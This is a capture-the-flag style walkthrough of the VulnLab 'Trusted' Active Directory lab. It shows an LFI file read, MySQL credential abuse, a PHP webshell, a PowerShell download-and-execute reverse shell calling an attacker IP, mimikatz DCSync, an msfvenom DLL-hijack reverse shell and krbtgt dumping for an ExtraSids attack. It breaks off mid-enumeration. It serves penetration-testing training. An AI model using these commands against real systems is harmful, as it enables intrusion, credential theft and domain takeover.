VulnLab Trusted
VulnLab Trusted
VulnLab Trusted
Trusted
Recon
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
└─$ rustscan -a 10.10.195.213,10.10.195.214 -r 1-65535
.----. .-. .-. .----..---. .----. .---. .--. .-. .-.
| {} }| { } |{ {__ {_ _}{ {__ / ___} / {} \ | `| |
| .-. \| {_} |.-._} } | | .-._} }\ }/ /\ \| |\ |
`-' `-'`-----'`----' `-' `----' `---' `-' `-'`-' `-'
The Modern Day Port Scanner.
________________________________________
: http://discord.skerritt.blog :
: https://github.com/RustScan/RustScan :
--------------------------------------
I scanned ports so fast, even my computer was surprised.
[~] The config file is expected to be at "/home/kali/.rustscan.toml"
[~] File limit higher than batch size. Can increase speed by increasing batch size '-b 65435'.
<SNIP>
Nmap scan report for 10.10.195.214
Host is up, received echo-reply ttl 127 (0.095s latency).
Scanned at 2024-12-15 18:36:41 +05 for 0s
PORT STATE SERVICE REASON
53/tcp open domain syn-ack ttl 127
80/tcp open http syn-ack ttl 127
88/tcp open kerberos-sec syn-ack ttl 127
135/tcp open msrpc syn-ack ttl 127
139/tcp open netbios-ssn syn-ack ttl 127
389/tcp open ldap syn-ack ttl 127
443/tcp open https syn-ack ttl 127
445/tcp open microsoft-ds syn-ack ttl 127
464/tcp open kpasswd5 syn-ack ttl 127
593/tcp open http-rpc-epmap syn-ack ttl 127
636/tcp open ldapssl syn-ack ttl 127
3268/tcp open globalcatLDAP syn-ack ttl 127
3269/tcp open globalcatLDAPssl syn-ack ttl 127
3306/tcp open mysql syn-ack ttl 127
3389/tcp open ms-wbt-server syn-ack ttl 127
5985/tcp open wsman syn-ack ttl 127
9389/tcp open adws syn-ack ttl 127
47001/tcp open winrm syn-ack ttl 127
49664/tcp open unknown syn-ack ttl 127
49665/tcp open unknown syn-ack ttl 127
49666/tcp open unknown syn-ack ttl 127
49667/tcp open unknown syn-ack ttl 127
49669/tcp open unknown syn-ack ttl 127
49672/tcp open unknown syn-ack ttl 127
49677/tcp open unknown syn-ack ttl 127
49678/tcp open unknown syn-ack ttl 127
49689/tcp open unknown syn-ack ttl 127
57952/tcp open unknown syn-ack ttl 127
60400/tcp open unknown syn-ack ttl 127
65435/tcp open unknown syn-ack ttl 127
<SNIP>
Nmap scan report for 10.10.195.213
Host is up, received echo-reply ttl 127 (0.091s latency).
Scanned at 2024-12-15 18:36:41 +05 for 1s
PORT STATE SERVICE REASON
53/tcp open domain syn-ack ttl 127
88/tcp open kerberos-sec syn-ack ttl 127
135/tcp open msrpc syn-ack ttl 127
139/tcp open netbios-ssn syn-ack ttl 127
389/tcp open ldap syn-ack ttl 127
445/tcp open microsoft-ds syn-ack ttl 127
464/tcp open kpasswd5 syn-ack ttl 127
593/tcp open http-rpc-epmap syn-ack ttl 127
636/tcp open ldapssl syn-ack ttl 127
3268/tcp open globalcatLDAP syn-ack ttl 127
3269/tcp open globalcatLDAPssl syn-ack ttl 127
3389/tcp open ms-wbt-server syn-ack ttl 127
5985/tcp open wsman syn-ack ttl 127
9389/tcp open adws syn-ack ttl 127
47001/tcp open winrm syn-ack ttl 127
49201/tcp open unknown syn-ack ttl 127
49664/tcp open unknown syn-ack ttl 127
49665/tcp open unknown syn-ack ttl 127
49666/tcp open unknown syn-ack ttl 127
49667/tcp open unknown syn-ack ttl 127
49669/tcp open unknown syn-ack ttl 127
49670/tcp open unknown syn-ack ttl 127
49673/tcp open unknown syn-ack ttl 127
49678/tcp open unknown syn-ack ttl 127
49679/tcp open unknown syn-ack ttl 127
49690/tcp open unknown syn-ack ttl 127
52811/tcp open unknown syn-ack ttl 127
53155/tcp open unknown syn-ack ttl 127
Read data files from: /usr/share/nmap
Nmap done: 1 IP address (1 host up) scanned in 0.51 seconds
Raw packets sent: 32 (1.384KB) | Rcvd: 29 (1.260KB)
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
└─$ nmap -sC -sV -p53,88,135,139,389,445,464,593,636,3269,3268,3389,5985,9389,47001,49201,49665,49667,49666,49664,49669,49670,49673,49678,49679,49690,52811,53155 10.10.195.213
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-12-15 18:38 +05
Nmap scan report for 10.10.195.213
Host is up (0.10s latency).
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2024-12-15 13:37:19Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: trusted.vl0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: trusted.vl0., Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
3389/tcp open ms-wbt-server Microsoft Terminal Services
| ssl-cert: Subject: commonName=trusteddc.trusted.vl
| Not valid before: 2024-12-14T13:27:37
|_Not valid after: 2025-06-15T13:27:37
| rdp-ntlm-info:
| Target_Name: TRUSTED
| NetBIOS_Domain_Name: TRUSTED
| NetBIOS_Computer_Name: TRUSTEDDC
| DNS_Domain_Name: trusted.vl
| DNS_Computer_Name: trusteddc.trusted.vl
| Product_Version: 10.0.20348
|_ System_Time: 2024-12-15T13:38:15+00:00
|_ssl-date: 2024-12-15T13:38:23+00:00; -1m16s from scanner time.
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9389/tcp open mc-nmf .NET Message Framing
47001/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49201/tcp open msrpc Microsoft Windows RPC
49664/tcp open msrpc Microsoft Windows RPC
49665/tcp open msrpc Microsoft Windows RPC
49666/tcp open msrpc Microsoft Windows RPC
49667/tcp open msrpc Microsoft Windows RPC
49669/tcp open msrpc Microsoft Windows RPC
49670/tcp open msrpc Microsoft Windows RPC
49673/tcp open msrpc Microsoft Windows RPC
49678/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49679/tcp open msrpc Microsoft Windows RPC
49690/tcp open msrpc Microsoft Windows RPC
52811/tcp open msrpc Microsoft Windows RPC
53155/tcp open msrpc Microsoft Windows RPC
Service Info: Host: TRUSTEDDC; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-time:
| date: 2024-12-15T13:38:16
|_ start_date: N/A
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled and required
|_clock-skew: mean: -1m16s, deviation: 0s, median: -1m17s
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 73.76 seconds
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
└─$ nmap -sC -sV -p53,80,88,135,139,389,445,443,464,593,636,3268,3269,3306,3389,5985,9389,49664,49666,49665,49667,49669,49672,49677,49678,49689,47001,57952,60400,65435 10.10.195.214
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-12-15 18:38 +05
Nmap scan report for 10.10.195.214
Host is up (0.091s latency).
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
80/tcp open http Apache httpd 2.4.53 ((Win64) OpenSSL/1.1.1n PHP/8.1.6)
|_http-server-header: Apache/2.4.53 (Win64) OpenSSL/1.1.1n PHP/8.1.6
| http-title: Welcome to XAMPP
|_Requested resource was http://10.10.195.214/dashboard/
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2024-12-15 13:37:20Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: trusted.vl0., Site: Default-First-Site-Name)
443/tcp open ssl/http Apache httpd 2.4.53 ((Win64) OpenSSL/1.1.1n PHP/8.1.6)
| ssl-cert: Subject: commonName=localhost
| Not valid before: 2009-11-10T23:48:47
|_Not valid after: 2019-11-08T23:48:47
| http-title: Welcome to XAMPP
|_Requested resource was https://10.10.195.214/dashboard/
|_ssl-date: TLS randomness does not represent time
| tls-alpn:
|_ http/1.1
|_http-server-header: Apache/2.4.53 (Win64) OpenSSL/1.1.1n PHP/8.1.6
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: trusted.vl0., Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
3306/tcp open mysql MySQL 5.5.5-10.4.24-MariaDB
| mysql-info:
| Protocol: 10
| Version: 5.5.5-10.4.24-MariaDB
| Thread ID: 11
| Capabilities flags: 63486
| Some Capabilities: Speaks41ProtocolOld, Speaks41ProtocolNew, SupportsCompression, InteractiveClient, FoundRows, Support41Auth, DontAllowDatabaseTableColumn, SupportsTransactions, IgnoreSigpipes, ODBCClient, SupportsLoadDataLocal, IgnoreSpaceBeforeParenthesis, ConnectWithDatabase, LongColumnFlag, SupportsMultipleStatments, SupportsMultipleResults, SupportsAuthPlugins
| Status: Autocommit
| Salt: nn`tIP3MjP2GO9k2S//>
|_ Auth Plugin Name: mysql_native_password
3389/tcp open ms-wbt-server Microsoft Terminal Services
| ssl-cert: Subject: commonName=labdc.lab.trusted.vl
| Not valid before: 2024-12-14T13:27:35
|_Not valid after: 2025-06-15T13:27:35
|_ssl-date: 2024-12-15T13:38:24+00:00; -1m17s from scanner time.
| rdp-ntlm-info:
| Target_Name: LAB
| NetBIOS_Domain_Name: LAB
| NetBIOS_Computer_Name: LABDC
| DNS_Domain_Name: lab.trusted.vl
| DNS_Computer_Name: labdc.lab.trusted.vl
| DNS_Tree_Name: trusted.vl
| Product_Version: 10.0.20348
|_ System_Time: 2024-12-15T13:38:18+00:00
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9389/tcp open mc-nmf .NET Message Framing
47001/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
49664/tcp open msrpc Microsoft Windows RPC
49665/tcp open msrpc Microsoft Windows RPC
49666/tcp open msrpc Microsoft Windows RPC
49667/tcp open msrpc Microsoft Windows RPC
49669/tcp open msrpc Microsoft Windows RPC
49672/tcp open msrpc Microsoft Windows RPC
49677/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49678/tcp open msrpc Microsoft Windows RPC
49689/tcp open msrpc Microsoft Windows RPC
57952/tcp open msrpc Microsoft Windows RPC
60400/tcp open msrpc Microsoft Windows RPC
65435/tcp open msrpc Microsoft Windows RPC
Service Info: Host: LABDC; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled and required
| smb2-time:
| date: 2024-12-15T13:38:18
|_ start_date: N/A
|_clock-skew: mean: -1m17s, deviation: 0s, median: -1m17s
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 75.01 seconds
labdc.lab.trusted.vl
We have web site running on port 80/443
Fuzzing the directories reslts in interesting endpoint /dev
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
└─$ gobuster dir -u http://10.10.195.214 -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://10.10.195.214
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.6
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/img (Status: 301) [Size: 336] [--> http://10.10.195.214/img/]
/dev (Status: 301) [Size: 336] [--> http://10.10.195.214/dev/]
/examples (Status: 503) [Size: 402]
/licenses (Status: 403) [Size: 421]
/dashboard (Status: 301) [Size: 342] [--> http://10.10.195.214/dashboard/]
Each page seems to involve /dev/index.html?view=, where view paramater contains file. Potential LFI/RFI vulnerability
We also find note in home page
Let’s test for LFI/RFI vulnerability. Sending \WINDOWS\system32\drivers\etc\hosts works, resulting in LFI
Since we know that it’s php based on note and default home page we saw on /dashboard endpoint, let’s try reading source code. But before that we need to fuzz for filenames
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
└─$ ffuf -u "http://10.10.195.214/dev/index.html?view=FUZZ.php" -w /usr/share/seclists/Discovery/Web-Content/raft-medium-words-lowercase.txt -fw 58
/'___\ /'___\ /'___\
/\ \__/ /\ \__/ __ __ /\ \__/
\ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
\ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
\ \_\ \ \_\ \ \____/ \ \_\
\/_/ \/_/ \/___/ \/_/
v2.1.0-dev
________________________________________________
:: Method : GET
:: URL : http://10.10.195.214/dev/index.html?view=FUZZ.php
:: Wordlist : FUZZ: /usr/share/seclists/Discovery/Web-Content/raft-medium-words-lowercase.txt
:: Follow redirects : false
:: Calibration : false
:: Timeout : 10
:: Threads : 40
:: Matcher : Response status: 200-299,301,302,307,401,403,405,500
:: Filter : Response words: 58
________________________________________________
db [Status: 200, Size: 763, Words: 26, Lines: 31, Duration: 96ms]
system [Status: 200, Size: 892, Words: 47, Lines: 32, Duration: 182ms]
pear [Status: 200, Size: 741, Words: 25, Lines: 31, Duration: 104ms]
table [Status: 200, Size: 1185, Words: 67, Lines: 38, Duration: 114ms]
con [Status: 200, Size: 1079, Words: 56, Lines: 35, Duration: 96ms]
We saw a note regarding database connection, let’s try reading db.php. We have to use php://filter to read it, thus we need to send php://filter/read=convert.base64-encode/resource=db.php as view parameter
Decode it
1
2
3
4
5
6
7
8
9
10
11
12
13
└─$ echo "PD9waHAgDQokc2VydmVybmFtZSA9ICJsb2NhbGhvc3QiOw0KJHVzZXJuYW1lID0gInJvb3QiOw0KJHBhc3N3b3JkID0gIlN1cGVyU2VjdXJlTXlTUUxQYXNzdzByZDEzMzcuIjsNCg0KJGNvbm4gPSBteXNxbGlfY29ubmVjdCgkc2VydmVybmFtZSwgJHVzZXJuYW1lLCAkcGFzc3dvcmQpOw0KDQppZiAoISRjb25uKSB7DQogIGRpZSgiQ29ubmVjdGlvbiBmYWlsZWQ6ICIgLiBteXNxbGlfY29ubmVjdF9lcnJvcigpKTsNCn0NCmVjaG8gIkNvbm5lY3RlZCBzdWNjZXNzZnVsbHkiOw0KPz4=" | base64 -d
<?php
$servername = "localhost";
$username = "root";
$password = "<REDACTED>";
$conn = mysqli_connect($servername, $username, $password);
if (!$conn) {
die("Connection failed: " . mysqli_connect_error());
}
echo "Connected successfully";
?>
We saw port 3306 open, let’s connect and enumerate database. We find news database with users table containing hashes
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
└─$ mysql -h 10.10.195.214 -u 'root' -p --skip-ssl
Enter password:
Welcome to the MariaDB monitor. Commands end with ; or \g.
Your MariaDB connection id is 23
Server version: 10.4.24-MariaDB mariadb.org binary distribution
Copyright (c) 2000, 2018, Oracle, MariaDB Corporation Ab and others.
Support MariaDB developers by giving a star at https://github.com/MariaDB/server
Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.
MariaDB [(none)]> show databases;
+--------------------+
| Database |
+--------------------+
| information_schema |
| mysql |
| news |
| performance_schema |
| phpmyadmin |
| test |
+--------------------+
6 rows in set (0.103 sec)
MariaDB [(none)]> use news;
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A
Database changed
MariaDB [news]> show tables;
+----------------+
| Tables_in_news |
+----------------+
| users |
+----------------+
1 row in set (0.090 sec)
MariaDB [news]> select * from users;
+----+------------+--------------+-----------+------------+
| id | first_name | short_handle | last_name | password |
+----+------------+--------------+-----------+------------+
| 1 | Robert | rsmith | Smith | <REDACTED> |
| 2 | Eric | ewalters | Walters | <REDACTED> |
| 3 | Christine | cpowers | Powers | <REDACTED> |
+----+------------+--------------+-----------+------------+
3 rows in set (0.101 sec)
Let’s crack them
1
2
3
4
5
└─$ hashcat -m 0 hashes /usr/share/wordlists/rockyou.txt
hashcat (v6.2.6) starting
<SNIP>
<REDACTED>:<REDACTED>
<SNIP>
Path 1
Moreover, it seems that we have file write privileges. If secure_file_priv is empty, it means we have both read and write privileges.
1
2
3
4
5
6
7
8
MariaDB [news]> show variables like "secure_file_priv";
+------------------+-------+
| Variable_name | Value |
+------------------+-------+
| secure_file_priv | |
+------------------+-------+
1 row in set (0.099 sec)
So we can create a webshell
1
2
MariaDB [news]> select '<?php system($_REQUEST["cmd"]); ?>' into outfile "C:\\xampp\\htdocs\\dev\\shell.php";
Query OK, 1 row affected (0.102 sec)
And we got system shell
Let’s get reverse shell
1
└─$ wget https://raw.githubusercontent.com/samratashok/nishang/master/Shells/Invoke-PowerShellTcp.ps1
1
└─$ echo "Invoke-PowerShellTcp -Reverse -IPAddress 10.8.4.147 -Port 6666" >> Invoke-PowerShellTcp.ps1
1
2
└─$ echo "IEX (New-Object Net.webclient).downloadString('http://10.8.4.147/Invoke-PowerShellTcp.ps1')" | iconv -t utf-16le | base64 -w 0; echo
SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAHcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AMQAwAC4AOAAuADQALgAxADQANwAvAEkAbgB2AG8AawBlAC0AUABvAHcAZQByAFMAaABlAGwAbABUAGMAcAAuAHAAcwAxACcAKQAKAA==
1
└─$ curl -s 'http://10.10.195.214/dev/shell.php?cmd=powershell+-ep+bypass+-w+hidden+-enc+SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAHcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AMQAwAC4AOAAuADQALgAxADQANwAvAEkAbgB2AG8AawBlAC0AUABvAHcAZQByAFMAaABlAGwAbABUAGMAcAAuAHAAcwAxACcAKQAKAA=='
And we got shell
We can use mimikatz or LaZagne to dump the hashes
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
PS C:\programdata\mimikatz\x64> .\mimikatz.exe "lsadump::dcsync /domain:lab.trusted.vl /user:LAB\Administrator" "exit"
.#####. mimikatz 2.2.0 (x64) #19041 Sep 19 2022 17:44:08
.## ^ ##. "A La Vie, A L'Amour" - (oe.eo)
## / \ ## /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
## \ / ## > https://blog.gentilkiwi.com/mimikatz
'## v ##' Vincent LE TOUX ( vincent.letoux@gmail.com )
'#####' > https://pingcastle.com / https://mysmartlogon.com ***/
mimikatz(commandline) # lsadump::dcsync /domain:lab.trusted.vl /user:LAB\Administrator
[DC] 'lab.trusted.vl' will be the domain
[DC] 'labdc.lab.trusted.vl' will be the DC server
[DC] 'LAB\Administrator' will be the user account
[rpc] Service : ldap
[rpc] AuthnSvc : GSS_NEGOTIATE (9)
Object RDN : Administrator
** SAM ACCOUNT **
SAM Username : Administrator
Account Type : 30000000 ( USER_OBJECT )
User Account Control : 00010200 ( NORMAL_ACCOUNT DONT_EXPIRE_PASSWD )
Account expiration : 1/1/1601 12:00:00 AM
Password last change : 9/14/2022 3:07:20 PM
Object Security ID : S-1-5-21-2241985869-2159962460-1278545866-500
Object Relative ID : 500
Credentials:
Hash NTLM: <REDACTED>
Supplemental Credentials:
* Primary:NTLM-Strong-NTOWF *
Random Value : ad401ca4d91e44c23f2660d1fbf9cc32
* Primary:Kerberos-Newer-Keys *
Default Salt : EC2AMAZ-J9QE7NIAdministrator
Default Iterations : 4096
Credentials
aes256_hmac (4096) : ef0dd1293ef26fdcb054dfecd324e272037f8af708bd2d6289d4010075605eb3
aes128_hmac (4096) : 8487e135528f40d60c99a45b071bbf86
des_cbc_md5 (4096) : b64aef752657b3c8
OldCredentials
aes256_hmac (4096) : e5f4c80cec03d5bacbcda19213807a5380e5e640eb7a18b0bd3b2183dd12b540
aes128_hmac (4096) : 3efe2e093f36073588d7ff5816a6668d
des_cbc_md5 (4096) : b3752676855de351
OlderCredentials
aes256_hmac (4096) : 747c8d353e4a940bd9dda531201dd0ca41d0fbb5c991fd78e3f7fd95682b8363
aes128_hmac (4096) : 063ea1d534b134e91b9497516215ff7c
des_cbc_md5 (4096) : 01c77334ab7c6d0d
* Packages *
NTLM-Strong-NTOWF
* Primary:Kerberos *
Default Salt : EC2AMAZ-J9QE7NIAdministrator
Credentials
des_cbc_md5 : b64aef752657b3c8
OldCredentials
des_cbc_md5 : b3752676855de351
mimikatz(commandline) # exit
Bye!
We got admin hash
1
2
3
4
└─$ nxc smb 10.10.195.214 -u administrator -H '<REDACTED>'
SMB 10.10.195.214 445 LABDC [*] Windows Server 2022 Build 20348 x64 (name:LABDC) (domain:lab.trusted.vl) (signing:True) (SMBv1:False)
SMB 10.10.195.214 445 LABDC [+] lab.trusted.vl\administrator:<REDACTED> (Pwn3d!)
Path 2
There’s also another way to pwn the domain. After cracking the hashes from DB, we can run bloodhound to retrieve domain topology
1
2
3
└─$ nxc smb 10.10.195.214 -u 'rsmith' -p '<REDACTED>'
SMB 10.10.195.214 445 LABDC [*] Windows Server 2022 Build 20348 x64 (name:LABDC) (domain:lab.trusted.vl) (signing:True) (SMBv1:False)
SMB 10.10.195.214 445 LABDC [+] lab.trusted.vl\rsmith:<REDACTED>
Let’s run bloodhound. There was some issue with bloodhound, which can be resolved by dnschef
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
└─$ dnschef --fakeip 10.10.195.214
/usr/bin/dnschef:453: SyntaxWarning: invalid escape sequence '\/'
header += " / _` | '_ \/ __|/ __| '_ \ / _ \ _|\n"
/usr/bin/dnschef:454: SyntaxWarning: invalid escape sequence '\_'
header += " | (_| | | | \__ \ (__| | | | __/ | \n"
/usr/bin/dnschef:455: SyntaxWarning: invalid escape sequence '\_'
header += " \__,_|_| |_|___/\___|_| |_|\___|_| \n"
_ _ __
| | version 0.4 | | / _|
__| |_ __ ___ ___| |__ ___| |_
/ _` | '_ \/ __|/ __| '_ \ / _ \ _|
| (_| | | | \__ \ (__| | | | __/ |
\__,_|_| |_|___/\___|_| |_|\___|_|
iphelix@thesprawl.org
(21:10:45) [*] DNSChef started on interface: 127.0.0.1
(21:10:45) [*] Using the following nameservers: 8.8.8.8
(21:10:45) [*] Cooking all A replies to point to 10.10.195.214
1
2
3
4
5
6
└─$ bloodhound-python -d lab.trusted.vl -u rsmith -p '<REDACTED>' -ns 127.0.0.1 -c all --zip -dc labdc.lab.trusted.vl
WARNING: Could not find a global catalog server, assuming the primary DC has this role
If this gives errors, either specify a hostname with -gc or disable gc resolution with --disable-autogc
INFO: Getting TGT for user
<SNIP>
In bloodhound we see that rsmith can change ewalters’ password, who is member of Remote Management Users and Remote Desktop Users group
Let’s change the password
1
2
3
4
5
6
7
8
└─$ impacket-changepasswd lab/ewalters@labdc.lab.trusted.vl -newpass 'P@ssw0rd!' -altuser rsmith -altpass '<REDACTED>' -reset
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
[*] Setting the password of lab\ewalters as lab\rsmith
[*] Connecting to DCE/RPC as lab\rsmith
[*] Password was changed successfully.
[!] User no longer has valid AES keys for Kerberos, until they change their password again.
1
2
3
└─$ nxc smb 10.10.195.214 -u ewalters -p 'P@ssw0rd!'
SMB 10.10.195.214 445 LABDC [*] Windows Server 2022 Build 20348 x64 (name:LABDC) (domain:lab.trusted.vl) (signing:True) (SMBv1:False)
SMB 10.10.195.214 445 LABDC [+] lab.trusted.vl\ewalters:P@ssw0rd!
Now we can connect as ewalters via winrm
1
2
3
4
5
6
7
8
9
10
11
└─$ evil-winrm -i 10.10.195.214 -u ewalters -p 'P@ssw0rd!'
Evil-WinRM shell v3.7
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\ewalters\Documents>
There’s a AVTest directory in C:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
*Evil-WinRM* PS C:\> ls
Directory: C:\
Mode LastWriteTime Length Name
---- ------------- ------ ----
d----- 9/14/2022 7:03 PM AVTest
d----- 8/19/2021 6:24 AM EFI
d----- 5/8/2021 8:20 AM PerfLogs
d-r--- 9/19/2022 3:46 PM Program Files
d----- 8/10/2022 4:06 AM Program Files (x86)
d-r--- 9/18/2022 9:07 PM Users
d----- 5/27/2023 4:12 PM Windows
d----- 9/14/2022 6:07 PM xampp
*Evil-WinRM* PS C:\> cd AVTest
*Evil-WinRM* PS C:\AVTest> ls
Directory: C:\AVTest
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 9/14/2022 4:46 PM 4870584 KasperskyRemovalTool.exe
-a---- 9/14/2022 7:05 PM 235 readme.txt
*Evil-WinRM* PS C:\AVTest> type readme.txt
Since none of the AV Tools we tried here in the lab satisfied our needs it's time to clean them up.
I asked Christine to run them a few times, just to be sure.
Let's just hope we don't have to set this lab up again because of this.
Assuming that it has to be run few times, there can be some scheduled task that runs it. We can download the binary and analyze it by using Procmon, we see that binary can’t find KasperskyRemovalToolENU.dll. Thus it is possible to perform DLL Hijacking attack.
We can create one with msfvenom
1
2
3
4
5
6
└─$ msfvenom -p windows/shell_reverse_tcp LHOST=10.8.4.147 LPORT=6666 -f dll > KasperskyRemovalToolENU.dll
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x86 from the payload
No encoder specified, outputting raw payload
Payload size: 324 bytes
Final size of dll file: 9216 bytes
Upload it to directory
1
2
3
*Evil-WinRM* PS C:\AVTest> iwr http://10.8.4.147/KasperskyRemovalToolENU.dll -outfile KasperskyRemovalToolENU.dll
*Evil-WinRM* PS C:\AVTest>
After few seconds we get our shell as cpowers
trusteddc.trusted.vl
Since we have administrative control over child domain, we can perform ExtraSids Attack. The things we need to perform the attack:
- The KRBTGT hash for the child domain
- The SID for the child domain
- The name of a target user in the child domain (Any domain user)
- The FQDN of the child domain.
- The SID of the Enterprise Admins group of the root domain. The attack can be performed from both windows and linux. We will do it from linux.
Let’s dump KRBTGT hash for the child domain
1
2
3
4
5
6
7
8
9
10
11
└─$ secretsdump.py LAB/Administrator:@10.10.195.214 -just-dc-user LAB/krbtgt -hashes ':<REDACTED>'
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:<REDACTED>:::
[*] Kerberos keys grabbed
krbtgt:aes256-cts-hmac-sha1-96:c930ddb15c3f84aafa01e816abc1112e38430b574ae3fcdd019e77bc906494aa
krbtgt:aes128-cts-hmac-sha1-96:db0b41cedf222df3808858fc41bb0c02
krbtgt:des-cbc-md5:0e89167916c134ad
[*] Cleaning up...
Get SID for the child domain
1
2
└─$ lookupsid.py LAB/Administrator:@10.10.195.214 -hashes ':<REDACTED>'| grep "Domain SID"
[*] Domain SID is: S-1-5-21-2241985869-2159962460-1278545866
Get SID of the Enterprise Admins group of the root domain
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
└─$ lookupsid.py LAB/Administrator:@10.10.195.213 -hashes ':<REDACTED>'| grep -B12 "Enterprise Admins"
[*] Domain SID is: S-1-5-21-3576695518-347000760-3731839591
498: TRUSTED\Enterprise Read-only Domain Controllers (SidTypeGroup)
500: TRUSTED\Administrator (SidTypeUser)
501: TRUSTED\Guest (SidTypeUser)
502: TRUSTED\krbtgt (SidTypeUser)
512: TRUSTED\Domain Admins (SidTypeGroup)
513: TRUSTED\Domain Users (SidTypeGroup)
514: TRUSTED\Domain Guests (SidTypeGroup)
515: TRUSTED\Domain Computers (SidTypeGroup)
516: TRUSTED\Domain Controllers (SidTypeGroup)
